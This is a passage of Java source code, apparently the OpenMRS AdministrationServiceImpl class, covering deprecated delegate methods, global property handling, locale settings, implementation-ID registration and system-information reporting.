org.openmrs.GlobalProperty; import org.openmrs.ImplementationId; import org.openmrs.Location; import org.openmrs.MimeType; import org.openmrs.OpenmrsObject; import org.openmrs.PatientIdentifierType; import org.openmrs.Privilege; import org.openmrs.Role; import org.openmrs.Tribe; import org.openmrs.User; import org.openmrs.api.APIAuthenticationException; import org.openmrs.api.APIException; import org.openmrs.api.AdministrationService; import org.openmrs.api.EventListeners; import org.openmrs.api.GlobalPropertyListener; import org.openmrs.api.context.Context; import org.openmrs.api.db.AdministrationDAO; import org.openmrs.customdatatype.CustomDatatypeUtil; import org.openmrs.module.Module; import org.openmrs.module.ModuleFactory; import org.openmrs.module.ModuleUtil; import org.openmrs.reporting.AbstractReportObject; import org.openmrs.reporting.Report; import org.openmrs.util.HttpClient; import org.openmrs.util.LocaleUtility; import org.openmrs.util.OpenmrsConstants; import org.openmrs.util.OpenmrsUtil; import org.openmrs.util.PrivilegeConstants; import org.springframework.transaction.annotation.Transactional; import org.springframework.util.StringUtils; import org.springframework.validation.Errors; /** * Default implementation of the administration services. This class should not be used on its own. * The current OpenMRS implementation should be fetched from the Context * * @see org.openmrs.api.AdministrationService * @see org.openmrs.api.context.Context */ @Transactional public class AdministrationServiceImpl extends BaseOpenmrsService implements AdministrationService, GlobalPropertyListener { protected Log log = LogFactory.getLog(getClass()); protected AdministrationDAO dao; private EventListeners eventListeners; /** * An always up-to-date collection of the allowed locales. */ private GlobalLocaleList globalLocaleList; private HttpClient implementationIdHttpClient; /** * Default empty constructor */ public AdministrationServiceImpl() { } /** * @see org.openmrs.api.AdministrationService#setAdministrationDAO(org.openmrs.api.db.AdministrationDAO) */ public void setAdministrationDAO(AdministrationDAO dao) { this.dao = dao; } public void setEventListeners(EventListeners eventListeners) { this.eventListeners = eventListeners; } /** * @see org.openmrs.api.AdministrationService#createEncounterType(org.openmrs.EncounterType) * @deprecated */ @Deprecated public void createEncounterType(EncounterType encounterType) throws APIException { Context.getEncounterService().saveEncounterType(encounterType); } /** * @see org.openmrs.api.AdministrationService#updateEncounterType(org.openmrs.EncounterType) * @deprecated */ @Deprecated public void updateEncounterType(EncounterType encounterType) throws APIException { Context.getEncounterService().saveEncounterType(encounterType); } /** * @see org.openmrs.api.AdministrationService#deleteEncounterType(org.openmrs.EncounterType) * @deprecated */ @Deprecated public void deleteEncounterType(EncounterType encounterType) throws APIException { Context.getEncounterService().purgeEncounterType(encounterType); } /** * @see org.openmrs.api.PatientService#savePatientIdentifierType(PatientIdentifierType) * @deprecated replaced by * {@link org.openmrs.api.PatientService#savePatientIdentifierType(PatientIdentifierType)} */ @Deprecated public void createPatientIdentifierType(PatientIdentifierType patientIdentifierType) throws APIException { Context.getPatientService().savePatientIdentifierType(patientIdentifierType); } /** * @see org.openmrs.api.PatientService#savePatientIdentifierType(PatientIdentifierType) * @deprecated replaced by * {@link org.openmrs.api.PatientService#savePatientIdentifierType(PatientIdentifierType)} */ @Deprecated public void updatePatientIdentifierType(PatientIdentifierType patientIdentifierType) throws APIException { Context.getPatientService().savePatientIdentifierType(patientIdentifierType); } /** * @see org.openmrs.api.PatientService#purgePatientIdentifierType(PatientIdentifierType) * @deprecated replaced by * {@link org.openmrs.api.PatientService#purgePatientIdentifierType(PatientIdentifierType)} */ @Deprecated public void deletePatientIdentifierType(PatientIdentifierType patientIdentifierType) throws APIException { Context.getPatientService().purgePatientIdentifierType(patientIdentifierType); } /** * Create a new Tribe * * @param tribe Tribe to create * @throws APIException * @deprecated */ @Deprecated public void createTribe(Tribe tribe) throws APIException { throw new APIException("The Tribe object is no longer supported. Install the Tribe module"); } /** * Update Tribe * * @param tribe Tribe to update * @throws APIException * @deprecated */ @Deprecated public void updateTribe(Tribe tribe) throws APIException { throw new APIException("The Tribe object is no longer supported. Install the Tribe module"); } /** * Delete Tribe * * @param tribe Tribe to delete * @throws APIException * @deprecated */ @Deprecated public void deleteTribe(Tribe tribe) throws APIException { throw new APIException("The Tribe object is no longer supported. Install the Tribe module"); } /** * Retire Tribe * * @param tribe Tribe to retire * @throws APIException * @deprecated */ @Deprecated public void retireTribe(Tribe tribe) throws APIException { throw new APIException("The Tribe object is no longer supported. Install the Tribe module"); } /** * Unretire Tribe * * @param tribe Tribe to unretire * @throws APIException * @deprecated */ @Deprecated public void unretireTribe(Tribe tribe) throws APIException { throw new APIException("The Tribe object is no longer supported. Install the Tribe module"); } /** * @deprecated */ @Deprecated public void createFieldType(FieldType fieldType) throws APIException { Context.getFormService().saveFieldType(fieldType); } /** * @deprecated */ @Deprecated public void updateFieldType(FieldType fieldType) throws APIException { Context.getFormService().saveFieldType(fieldType); } /** * @deprecated */ @Deprecated public void deleteFieldType(FieldType fieldType) throws APIException { Context.getFormService().purgeFieldType(fieldType); } /** * @deprecated use {@link org.openmrs.api.ObsService#saveMimeType(MimeType)} */ @Deprecated public void createMimeType(MimeType mimeType) throws APIException { Context.getObsService().saveMimeType(mimeType); } /** * @deprecated use {@link org.openmrs.api.ObsService#saveMimeType(MimeType)} */ @Deprecated public void updateMimeType(MimeType mimeType) throws APIException { Context.getObsService().saveMimeType(mimeType); } /** * @deprecated use {@link org.openmrs.api.ObsService#purgeMimeType(MimeType)} */ @Deprecated public void deleteMimeType(MimeType mimeType) throws APIException { Context.getObsService().purgeMimeType(mimeType); } /** * @see org.openmrs.api.AdministrationService#createLocation(org.openmrs.Location) * @deprecated */ @Deprecated public void createLocation(Location location) throws APIException { Context.getLocationService().saveLocation(location); } /** * @see org.openmrs.api.AdministrationService#updateLocation(org.openmrs.Location) * @deprecated */ @Deprecated public void updateLocation(Location location) throws APIException { Context.getLocationService().saveLocation(location); } /** * @see org.openmrs.api.AdministrationService#deleteLocation(org.openmrs.Location) * @deprecated */ @Deprecated public void deleteLocation(Location location) throws APIException { Context.getLocationService().purgeLocation(location); } /** * @see org.openmrs.api.AdministrationService#createRole(org.openmrs.Role) * @deprecated */ @Deprecated public void createRole(Role role) throws APIException { Context.getUserService().saveRole(role); } /** * @see org.openmrs.api.AdministrationService#updateRole(org.openmrs.Role) * @deprecated */ @Deprecated public void updateRole(Role role) throws APIException { Context.getUserService().saveRole(role); } /** * @see org.openmrs.api.AdministrationService#deleteRole(org.openmrs.Role) * @deprecated */ @Deprecated public void deleteRole(Role role) throws APIException { Context.getUserService().purgeRole(role); } /** * @see org.openmrs.api.AdministrationService#createPrivilege(org.openmrs.Privilege) * @deprecated */ @Deprecated public void createPrivilege(Privilege privilege) throws APIException { Context.getUserService().savePrivilege(privilege); } /** * @see org.openmrs.api.AdministrationService#updatePrivilege(org.openmrs.Privilege) * @deprecated */ @Deprecated public void updatePrivilege(Privilege privilege) throws APIException { Context.getUserService().savePrivilege(privilege); } /** * @see org.openmrs.api.AdministrationService#deletePrivilege(org.openmrs.Privilege) * @deprecated */ @Deprecated public void deletePrivilege(Privilege privilege) throws APIException { Context.getUserService().purgePrivilege(privilege); } /** * @deprecated moved to ConceptService */ @Deprecated public void createConceptClass(ConceptClass cc) throws APIException { Context.getConceptService().saveConceptClass(cc); } /** * @deprecated moved to ConceptService */ @Deprecated public void updateConceptClass(ConceptClass cc) throws APIException { Context.getConceptService().saveConceptClass(cc); } /** * @deprecated moved to ConceptService */ @Deprecated public void deleteConceptClass(ConceptClass cc) throws APIException { Context.getConceptService().purgeConceptClass(cc); } /** * @deprecated moved to ConceptService */ @Deprecated public void createConceptDatatype(ConceptDatatype cd) throws APIException { Context.getConceptService().saveConceptDatatype(cd); } /** * @deprecated moved to ConceptService */ @Deprecated public void updateConceptDatatype(ConceptDatatype cd) throws APIException { Context.getConceptService().saveConceptDatatype(cd); } /** * @deprecated moved to ConceptService */ @Deprecated public void deleteConceptDatatype(ConceptDatatype cd) throws APIException { Context.getConceptService().purgeConceptDatatype(cd); } /** * Create a new Report * * @param report Report to create * @deprecated see reportingcompatibility module * @throws APIException */ @Deprecated public void createReport(Report report) throws APIException { if (!Context.hasPrivilege(OpenmrsConstants.PRIV_ADD_REPORTS)) throw new APIAuthenticationException("Privilege required: " + OpenmrsConstants.PRIV_ADD_REPORTS); dao.createReport(report); } /** * Update Report * * @param report Report to update * @deprecated see reportingcompatibility module * @throws APIException */ @Deprecated public void updateReport(Report report) throws APIException { if (!Context.hasPrivilege(OpenmrsConstants.PRIV_EDIT_REPORTS)) throw new APIAuthenticationException("Privilege required: " + OpenmrsConstants.PRIV_EDIT_REPORTS); dao.updateReport(report); } /** * Delete Report * * @param report Report to delete * @deprecated see reportingcompatibility module * @throws APIException */ @Deprecated public void deleteReport(Report report) throws APIException { if (!Context.hasPrivilege(OpenmrsConstants.PRIV_DELETE_REPORTS)) throw new APIAuthenticationException("Privilege required: " + OpenmrsConstants.PRIV_DELETE_REPORTS); dao.deleteReport(report); } /** * Create a new Report Object * * @param reportObject Report Object to create * @deprecated see reportingcompatibility module * @throws APIException */ @Deprecated public void createReportObject(AbstractReportObject reportObject) throws APIException { if (!Context.hasPrivilege(OpenmrsConstants.PRIV_ADD_REPORT_OBJECTS)) throw new APIAuthenticationException("Privilege required: " + OpenmrsConstants.PRIV_ADD_REPORT_OBJECTS); dao.createReportObject(reportObject); } /** * Update Report Object * * @param reportObject Report Object to update * @deprecated see reportingcompatibility module * @throws APIException */ @Deprecated public void updateReportObject(AbstractReportObject reportObject) throws APIException { if (!Context.hasPrivilege(OpenmrsConstants.PRIV_EDIT_REPORT_OBJECTS)) throw new APIAuthenticationException("Privilege required: " + OpenmrsConstants.PRIV_EDIT_REPORT_OBJECTS); dao.updateReportObject(reportObject); } /** * Delete Report Object * * @param reportObjectId Internal Integer identifier of Report Object to delete * @deprecated see reportingcompatibility module * @throws APIException */ @Deprecated public void deleteReportObject(Integer reportObjectId) throws APIException { if (!Context.hasPrivilege(OpenmrsConstants.PRIV_DELETE_REPORT_OBJECTS)) throw new APIAuthenticationException("Privilege required: " + OpenmrsConstants.PRIV_DELETE_REPORT_OBJECTS); dao.deleteReportObject(reportObjectId); } /** * @deprecated moved to ConceptServiceImpl */ @Deprecated public void updateConceptWord(Concept concept) throws APIException { Context.getConceptService().updateConceptWord(concept); } /** * @deprecated moved to ConceptServiceImpl */ @Deprecated public void updateConceptWords() throws APIException { Context.getConceptService().updateConceptWords(); } /** * @deprecated moved to ConceptService */ @Deprecated public void updateConceptWords(Integer conceptIdStart, Integer conceptIdEnd) throws APIException { Context.getConceptService().updateConceptWords(conceptIdStart, conceptIdEnd); } /** * @deprecated moved to ConceptService */ @Deprecated public void createConceptProposal(ConceptProposal cp) throws APIException { Context.getConceptService().saveConceptProposal(cp); } /** * @deprecated moved to ConceptService */ @Deprecated public void updateConceptProposal(ConceptProposal cp) throws APIException { Context.getConceptService().saveConceptProposal(cp); } /** * @deprecated moved to ConceptService */ @Deprecated public void mapConceptProposalToConcept(ConceptProposal cp, Concept mappedConcept) throws APIException { Context.getConceptService().mapConceptProposalToConcept(cp, mappedConcept); } /** * @deprecated moved to ConceptService * @see org.openmrs.api.AdministrationService#rejectConceptProposal(org.openmrs.ConceptProposal) */ @Deprecated public void rejectConceptProposal(ConceptProposal cp) { Context.getConceptService().rejectConceptProposal(cp); } /** * @see org.openmrs.api.AdministrationService#mrnGeneratorLog(java.lang.String, * java.lang.Integer, java.lang.Integer) * @deprecated */ @Deprecated public void mrnGeneratorLog(String site, Integer start, Integer count) throws APIException { if (!Context.hasPrivilege(PrivilegeConstants.EDIT_PATIENTS)) throw new APIAuthenticationException("Privilege required: " + PrivilegeConstants.EDIT_PATIENTS); dao.mrnGeneratorLog(site, start, count); } /** * @see org.openmrs.api.AdministrationService#getMRNGeneratorLog() * @deprecated */ @Deprecated @Transactional(readOnly = true) public Collection<?> getMRNGeneratorLog() throws APIException { if (!Context.hasPrivilege(PrivilegeConstants.EDIT_PATIENTS)) throw new APIAuthenticationException("Privilege required: " + PrivilegeConstants.EDIT_PATIENTS); return dao.getMRNGeneratorLog(); } /** * Static-ish variable used to cache the system variables. This is not static so that every time * a module is loaded or removed the variable is destroyed (along with the administration * service) and recreated the next time it is called */ protected SortedMap<String, String> systemVariables = null; /** * Set of locales which can be used to present messages in the user interface. Created lazily as * needed by {@link #getAllowedLocales()}. */ private HashSet<Locale> presentationLocales; /** * @see org.openmrs.api.AdministrationService#getSystemVariables() */ @Transactional(readOnly = true) public SortedMap<String, String> getSystemVariables() throws APIException { if (systemVariables == null) { systemVariables = new TreeMap<String, String>(); // Added the server's fully qualified domain name try { systemVariables.put("OPENMRS_HOSTNAME", InetAddress.getLocalHost().getCanonicalHostName()); } catch (UnknownHostException e) { systemVariables.put("OPENMRS_HOSTNAME", "Unknown host: " + e.getMessage()); } systemVariables.put("OPENMRS_VERSION", String.valueOf(OpenmrsConstants.OPENMRS_VERSION)); systemVariables.put("DATABASE_NAME", OpenmrsConstants.DATABASE_NAME); systemVariables.put("DATABASE_BUSINESS_NAME", OpenmrsConstants.DATABASE_BUSINESS_NAME); systemVariables.put("OBSCURE_PATIENTS", String.valueOf(OpenmrsConstants.OBSCURE_PATIENTS)); systemVariables.put("OBSCURE_PATIENTS_FAMILY_NAME", OpenmrsConstants.OBSCURE_PATIENTS_FAMILY_NAME); systemVariables.put("OBSCURE_PATIENTS_GIVEN_NAME", OpenmrsConstants.OBSCURE_PATIENTS_GIVEN_NAME); systemVariables.put("OBSCURE_PATIENTS_MIDDLE_NAME", OpenmrsConstants.OBSCURE_PATIENTS_MIDDLE_NAME); systemVariables.put("MODULE_REPOSITORY_PATH", ModuleUtil.getModuleRepository().getAbsolutePath()); systemVariables.put("OPERATING_SYSTEM_KEY", String.valueOf(OpenmrsConstants.OPERATING_SYSTEM_KEY)); systemVariables.put("OPERATING_SYSTEM", String.valueOf(OpenmrsConstants.OPERATING_SYSTEM)); } return systemVariables; } /** * @see org.openmrs.api.AdministrationService#getGlobalProperty(java.lang.String) */ @Transactional(readOnly = true) public String getGlobalProperty(String propertyName) throws APIException { // This method should not have any authorization check if (propertyName == null) return null; return dao.getGlobalProperty(propertyName); } /** * @see org.openmrs.api.AdministrationService#getGlobalProperty(java.lang.String, * java.lang.String) */ @Transactional(readOnly = true) public String getGlobalProperty(String propertyName, String defaultValue) throws APIException { String s = getGlobalProperty(propertyName); if (s == null) return defaultValue; return s; } /** * @see org.openmrs.api.AdministrationService#getGlobalPropertyObject(java.lang.String) */ @Transactional(readOnly = true) public GlobalProperty getGlobalPropertyObject(String propertyName) { return dao.getGlobalPropertyObject(propertyName); } /** * @see org.openmrs.api.AdministrationService#getGlobalProperties() * @deprecated */ @Deprecated @Transactional(readOnly = true) public List<GlobalProperty> getGlobalProperties() throws APIException { return getAllGlobalProperties(); } /** * @see org.openmrs.api.AdministrationService#setGlobalProperties(java.util.List) * @deprecated */ @Deprecated public void setGlobalProperties(List<GlobalProperty> props) throws APIException { Context.getAdministrationService().saveGlobalProperties(props); } /** * @see org.openmrs.api.AdministrationService#deleteGlobalProperty(java.lang.String) * @deprecated */ @Deprecated public void deleteGlobalProperty(String propertyName) throws APIException { purgeGlobalProperty(new GlobalProperty(propertyName)); } /** * @see org.openmrs.api.AdministrationService#setGlobalProperty(java.lang.String, * java.lang.String) */ public void setGlobalProperty(String propertyName, String propertyValue) throws APIException { GlobalProperty gp = getGlobalPropertyObject(propertyName); if (gp == null) { gp = new GlobalProperty(); gp.setProperty(propertyName); } gp.setPropertyValue(propertyValue); dao.saveGlobalProperty(gp); } /** * @see org.openmrs.api.AdministrationService#updateGlobalProperty(java.lang.String, * java.lang.String) */ public void updateGlobalProperty(String propertyName, String propertyValue) throws IllegalStateException { GlobalProperty gp = getGlobalPropertyObject(propertyName); if (gp == null) { throw new IllegalStateException("Global property with the given propertyName does not exist" + propertyName); } gp.setPropertyValue(propertyValue); dao.saveGlobalProperty(gp); } /** * @see org.openmrs.api.AdministrationService#setGlobalProperty(org.openmrs.GlobalProperty) * @deprecated */ @Deprecated public void setGlobalProperty(GlobalProperty gp) throws APIException { Context.getAdministrationService().saveGlobalProperty(gp); } /** * @see org.openmrs.api.AdministrationService#addGlobalProperty(org.openmrs.GlobalProperty) * @deprecated */ @Deprecated public void addGlobalProperty(GlobalProperty gp) { setGlobalProperty(gp); } /** * @see org.openmrs.api.AdministrationService#addGlobalProperty(java.lang.String, * java.lang.String) * @deprecated */ @Deprecated public void addGlobalProperty(String propertyName, String propertyValue) throws APIException { //dao.addGlobalProperty(propertyName, propertyValue); Context.getAdministrationService().saveGlobalProperty(new GlobalProperty(propertyName, propertyValue)); } /** * @see org.openmrs.api.AdministrationService#getAllGlobalProperties() */ @Transactional(readOnly = true) public List<GlobalProperty> getAllGlobalProperties() throws APIException { return dao.getAllGlobalProperties(); } /** * @see org.openmrs.api.AdministrationService#getGlobalPropertiesByPrefix(java.lang.String) */ @Transactional(readOnly = true) public List<GlobalProperty> getGlobalPropertiesByPrefix(String prefix) { return dao.getGlobalPropertiesByPrefix(prefix); } /** * @see org.openmrs.api.AdministrationService#getGlobalPropertiesBySuffix(java.lang.String) */ @Transactional(readOnly = true) public List<GlobalProperty> getGlobalPropertiesBySuffix(String suffix) { return dao.getGlobalPropertiesBySuffix(suffix); } /** * @see org.openmrs.api.AdministrationService#purgeGlobalProperty(org.openmrs.GlobalProperty) */ public void purgeGlobalProperty(GlobalProperty globalProperty) throws APIException { notifyGlobalPropertyDelete(globalProperty.getProperty()); dao.deleteGlobalProperty(globalProperty); } /** * @see org.openmrs.api.AdministrationService#saveGlobalProperties(java.util.List) */ public List<GlobalProperty> saveGlobalProperties(List<GlobalProperty> props) throws APIException { log.debug("saving a list of global properties"); // add all of the new properties for (GlobalProperty prop : props) { if (prop.getProperty() != null && prop.getProperty().length() > 0) { Context.getAdministrationService().saveGlobalProperty(prop); } } return props; } /** * @see org.openmrs.api.AdministrationService#saveGlobalProperty(org.openmrs.GlobalProperty) */ public GlobalProperty saveGlobalProperty(GlobalProperty gp) throws APIException { // only try to save it if the global property has a key if (gp.getProperty() != null && gp.getProperty().length() > 0) { CustomDatatypeUtil.saveIfDirty(gp); dao.saveGlobalProperty(gp); notifyGlobalPropertyChange(gp); return gp; } return gp; } /** * @see org.openmrs.api.AdministrationService#executeSQL(java.lang.String, boolean) */ public List<List<Object>> executeSQL(String sql, boolean selectOnly) throws APIException { if (sql == null || sql.trim().equals("")) return null; return dao.executeSQL(sql, selectOnly); } /** * @see org.openmrs.api.AdministrationService#addGlobalPropertyListener(GlobalPropertyListener) */ public void addGlobalPropertyListener(GlobalPropertyListener listener) { eventListeners.getGlobalPropertyListeners().add(listener); } /** * @see org.openmrs.api.AdministrationService#removeGlobalPropertyListener(GlobalPropertyListener) */ public void removeGlobalPropertyListener(GlobalPropertyListener listener) { eventListeners.getGlobalPropertyListeners().remove(listener); } /** * Calls global property listeners registered for this create/change * * @param gp */ private void notifyGlobalPropertyChange(GlobalProperty gp) { for (GlobalPropertyListener listener : eventListeners.getGlobalPropertyListeners()) if (listener.supportsPropertyName(gp.getProperty())) listener.globalPropertyChanged(gp); } /** * Calls global property listeners registered for this delete * * @param propertyName */ private void notifyGlobalPropertyDelete(String propertyName) { for (GlobalPropertyListener listener : eventListeners.getGlobalPropertyListeners()) if (listener.supportsPropertyName(propertyName)) listener.globalPropertyDeleted(propertyName); } /** * @see org.openmrs.api.AdministrationService#getImplementationId() */ @Transactional(readOnly = true) public ImplementationId getImplementationId() throws APIException { String property = getGlobalProperty(OpenmrsConstants.GLOBAL_PROPERTY_IMPLEMENTATION_ID); // fail early if no gp has been defined yet if (property == null) return null; try { ImplementationId implId = OpenmrsUtil.getSerializer().read(ImplementationId.class, property); return implId; } catch (Throwable t) { log.debug("Error while getting implementation id", t); } return null; } /** * @see org.openmrs.api.AdministrationService#setImplementationId(org.openmrs.ImplementationId) */ public void setImplementationId(ImplementationId implementationId) throws APIException { if (implementationId == null) return; // check the validity of this implementation id with the server String description = implementationId.getDescription(); try { // check that source id is valid description = checkImplementationIdValidity(implementationId.getImplementationId(), description, implementationId.getPassphrase()); // save the server's description back to this concept source object implementationId.setDescription(description); boolean foundMatchingSource = false; // loop over the concept sources to make sure one exists for this hl7Code/implementationId List<ConceptSource> sources = Context.getConceptService().getAllConceptSources(); if (sources != null) { for (ConceptSource source : sources) { if (implementationId.getImplementationId().equals(source.getHl7Code())) { foundMatchingSource = true; } } } // if no ConceptSource currently exists with this implementationId, save this implId // as a new ConceptSource if (!foundMatchingSource) { ConceptSource newConceptSource = new ConceptSource(); newConceptSource.setName(implementationId.getName()); newConceptSource.setDescription(implementationId.getDescription()); newConceptSource.setHl7Code(implementationId.getImplementationId()); if (Context.getAuthenticatedUser() == null) // (hackish) newConceptSource.setCreator(new User(1)); // fake the user because no one is logged in Context.getConceptService().saveConceptSource(newConceptSource); } // serialize and save the ImplementationId to the global properties table StringWriter stringWriter = new StringWriter(); OpenmrsUtil.getSerializer().write(implementationId, stringWriter); Context.getAdministrationService().saveGlobalProperty( new GlobalProperty(OpenmrsConstants.GLOBAL_PROPERTY_IMPLEMENTATION_ID, stringWriter.toString())); } catch (APIException e) { throw e; } catch (Exception e) { // pass any other exceptions on up the train throw new APIException(e); } finally { // save an empty concept source to the database when something fails? } } /** * Checks the remote server for this exact implementation id. Returns the description if 1) * there is no implementation id or 2) there is a implementation id and this passphrase matches * it. In the case of 1), this implementation id and passphrase are saved to the remote server's * database * * @param implementationId * @param description * @param passphrase * @return the stored description on the remote server * @throws APIException * @throws UnsupportedEncodingException */ private String checkImplementationIdValidity(String implementationId, String description, String passphrase) throws APIException { if (!StringUtils.hasLength(implementationId)) throw new APIException("The implementationid cannot be empty"); if (!StringUtils.hasLength(description)) throw new APIException("The description cannot be empty"); if (!StringUtils.hasLength(passphrase)) throw new APIException("The passphrase cannot be empty"); // set up the data map to post to the openmrs server Map<String, String> data = new HashMap<String, String>(); data.put("implementationId", implementationId); data.put("description", description); data.put("passphrase", passphrase); String response = implementationIdHttpClient.post(data); response = response.trim(); if ("".equals(response)) { String ms = Context.getMessageSourceService().getMessage("ImplementationId.connectionError", new String[] { implementationId }, Context.getLocale()); throw new APIException(ms); } if (log.isDebugEnabled()) log.debug("Response: " + response); if (response.startsWith("Success")) { response = response.replace("Success", ""); return response.trim(); } String ms = Context.getMessageSourceService().getMessage("ImplementationId.invalidIdorPassphrase", new String[] { description }, Context.getLocale()); throw new APIException(ms); } /** * @see org.openmrs.api.AdministrationService#getAllowedLocales() */ @Transactional(readOnly = true) public List<Locale> getAllowedLocales() { // lazy-load the global locale list and initialize with current global property value if (globalLocaleList == null) { globalLocaleList = new GlobalLocaleList(); addGlobalPropertyListener(globalLocaleList); } Set<Locale> allowedLocales = globalLocaleList.getAllowedLocales(); // update the GlobalLocaleList.allowedLocales by faking a global property change if (allowedLocales == null) { // use a default language of "english" if they have cleared this GP for some reason String currentPropertyValue = getGlobalProperty(OpenmrsConstants.GLOBAL_PROPERTY_LOCALE_ALLOWED_LIST, LocaleUtility.getDefaultLocale().toString()); GlobalProperty allowedLocalesProperty = new GlobalProperty(OpenmrsConstants.GLOBAL_PROPERTY_LOCALE_ALLOWED_LIST, currentPropertyValue); globalLocaleList.globalPropertyChanged(allowedLocalesProperty); allowedLocales = globalLocaleList.getAllowedLocales(); } // allowedLocales is guaranteed to not be null at this point return new ArrayList<Locale>(allowedLocales); } /** * Used by spring to set the GlobalLocaleList on this implementation * * @param gll the GlobalLocaleList object that is registered to the GlobalPropertyListeners as * well */ public void setGlobalLocaleList(GlobalLocaleList gll) { globalLocaleList = gll; } /** * @see org.openmrs.api.AdministrationService#getPresentationLocales() */ @Transactional(readOnly = true) public Set<Locale> getPresentationLocales() { if (presentationLocales == null) { presentationLocales = new HashSet<Locale>(); Collection<Locale> messageLocales = Context.getMessageSourceService().getLocales(); List<Locale> allowedLocales = getAllowedLocales(); for (Locale possibleLocale : messageLocales) { if (allowedLocales.contains(possibleLocale)) { presentationLocales.add(possibleLocale); } else { // to be sure, check for language-only matches for (Locale allowedLocale : allowedLocales) { if (("".equals(allowedLocale.getCountry()) || "".equals(possibleLocale.getCountry())) && (allowedLocale.getLanguage().equals(possibleLocale.getLanguage()))) { presentationLocales.add(possibleLocale); break; } } } } } return presentationLocales; } /** * @see org.openmrs.api.GlobalPropertyListener#globalPropertyChanged(org.openmrs.GlobalProperty) */ public void globalPropertyChanged(GlobalProperty newValue) { if (newValue.getProperty().equals(OpenmrsConstants.GLOBAL_PROPERTY_LOCALE_ALLOWED_LIST)) { // reset the calculated locale values presentationLocales = null; } } /** * @see org.openmrs.api.GlobalPropertyListener#globalPropertyDeleted(java.lang.String) */ public void globalPropertyDeleted(String propertyName) { // TODO Auto-generated method stub } /** * @see org.openmrs.api.GlobalPropertyListener#supportsPropertyName(java.lang.String) */ public boolean supportsPropertyName(String propertyName) { return propertyName.equals(OpenmrsConstants.GLOBAL_PROPERTY_LOCALE_ALLOWED_LIST); } /** * @see org.openmrs.api.AdministrationService#getGlobalPropertyByUuid(java.lang.String) */ @Transactional(readOnly = true) public GlobalProperty getGlobalPropertyByUuid(String uuid) { return dao.getGlobalPropertyByUuid(uuid); } /** * @see org.openmrs.api.AdministrationService#getGlobalPropertyValue(java.lang.String, * java.lang.Object) */ @SuppressWarnings("unchecked") public <T> T getGlobalPropertyValue(String propertyName, T defaultValue) throws APIException { if (defaultValue == null) throw new IllegalArgumentException("The defaultValue argument cannot be null"); String propVal = getGlobalProperty(propertyName); if (!StringUtils.hasLength(propVal)) return defaultValue; try { return (T) defaultValue.getClass().getDeclaredConstructor(String.class).newInstance(propVal); } catch (InstantiationException e) { throw new APIException(defaultValue.getClass().getName() + " is not able to be instantiated with value: " + propVal, e); } catch (NoSuchMethodException e) { throw new APIException(defaultValue.getClass().getName() + " does not have a string constructor", e); } catch (Exception e) { log.error("Unable to turn value '" + propVal + "' into type " + defaultValue.getClass().getName(), e); return defaultValue; } } /** * @see org.openmrs.api.AdministrationService#getSystemInformation() */ @Transactional(readOnly = true) public Map<String, Map<String, String>> getSystemInformation() throws APIException { Map<String, Map<String, String>> systemInfoMap = new LinkedHashMap<String, Map<String, String>>(); systemInfoMap.put("SystemInfo.title.openmrsInformation", new LinkedHashMap<String, String>() { private static final long serialVersionUID = 1L; { put("SystemInfo.OpenMRSInstallation.systemDate", new SimpleDateFormat("yyyy-MM-dd").format(Calendar .getInstance().getTime())); put("SystemInfo.OpenMRSInstallation.systemTime", new SimpleDateFormat("HH:mm:ss").format(Calendar .getInstance().getTime())); put("SystemInfo.OpenMRSInstallation.openmrsVersion", OpenmrsConstants.OPENMRS_VERSION); try { put("SystemInfo.hostname", InetAddress.getLocalHost().getCanonicalHostName()); } catch (UnknownHostException e) { put("SystemInfo.hostname", "Unknown host: " + e.getMessage()); } } }); systemInfoMap.put("SystemInfo.title.javaRuntimeEnvironmentInformation", new LinkedHashMap<String, String>() { Properties properties = System.getProperties(); private static final long serialVersionUID = 1L; { put("SystemInfo.JavaRuntimeEnv.operatingSystem", properties.getProperty("os.name")); put("SystemInfo.JavaRuntimeEnv.operatingSystemArch", properties.getProperty("os.arch")); put("SystemInfo.JavaRuntimeEnv.operatingSystemVersion", properties.getProperty("os.version")); put("SystemInfo.JavaRuntimeEnv.javaVersion", properties.getProperty("java.version")); put("SystemInfo.JavaRuntimeEnv.javaVendor", properties.getProperty("java.vendor")); put("SystemInfo.JavaRuntimeEnv.jvmVersion", properties.getProperty("java.vm.version")); put("SystemInfo.JavaRuntimeEnv.jvmVendor", properties.getProperty("java.vm.vendor")); put("SystemInfo.JavaRuntimeEnv.javaRuntimeName", properties.getProperty("java.runtime.name")); put("SystemInfo.JavaRuntimeEnv.javaRuntimeVersion", properties.getProperty("java.runtime.version")); put("SystemInfo.JavaRuntimeEnv.userName", properties.getProperty("user.name")); put("SystemInfo.JavaRuntimeEnv.systemLanguage", properties.getProperty("user.language")); put("SystemInfo.JavaRuntimeEnv.systemTimezone", properties.getProperty("user.timezone")); put("SystemInfo.JavaRuntimeEnv.fileSystemEncoding", properties.getProperty("sun.jnu.encoding")); put("SystemInfo.JavaRuntimeEnv.userDirectory", properties.getProperty("user.dir")); put("SystemInfo.JavaRuntimeEnv.tempDirectory", properties.getProperty("java.io.tmpdir")); } }); systemInfoMap.put("SystemInfo.title.memoryInformation", new LinkedHashMap<String, String>() { private static final long serialVersionUID = 1L; Runtime runtime = Runtime.getRuntime(); { put("SystemInfo.Memory.totalMemory", convertToMegaBytes(runtime.totalMemory())); put("SystemInfo.Memory.freeMemory", convertToMegaBytes(runtime.freeMemory())); put("SystemInfo.Memory.maximumHeapSize", convertToMegaBytes(runtime.maxMemory())); } }); systemInfoMap.put("SystemInfo.title.dataBaseInformation", new LinkedHashMap<String, String>() { Properties properties = Context.getRuntimeProperties(); private static final long serialVersionUID = 1L; { put("SystemInfo.Database.name", OpenmrsConstants.DATABASE_NAME); put("SystemInfo.Database.connectionURL", properties.getProperty("connection.url")); put("SystemInfo.Database.userName", properties.getProperty("connection.username")); put("SystemInfo.Database.driver", properties.getProperty("hibernate.connection.driver_class")); put("SystemInfo.Database.dialect", properties.getProperty("hibernate.dialect")); } }); systemInfoMap.put("SystemInfo.title.moduleInformation", new LinkedHashMap<String, String>() { private static final long serialVersionUID = 1L; { put("SystemInfo.Module.repositoryPath", ModuleUtil.getModuleRepository().getAbsolutePath()); Collection<Module> loadedModules = ModuleFactory.getLoadedModules(); for (Module module : loadedModules) { String moduleInfo = module.getVersion() + " " + (module.isStarted() ? "" : Context.getMessageSourceService().getMessage("Module.notStarted")); put(module.getName(), moduleInfo); } } }); return systemInfoMap; } /** * @param bytes to be converted into mega bytes * @return memory in mega bytes */ private String convertToMegaBytes(long bytes) { int ONE_KILO_BYTE = 1024; return String.valueOf(bytes / ONE_KILO_BYTE / ONE_KILO_BYTE) + " 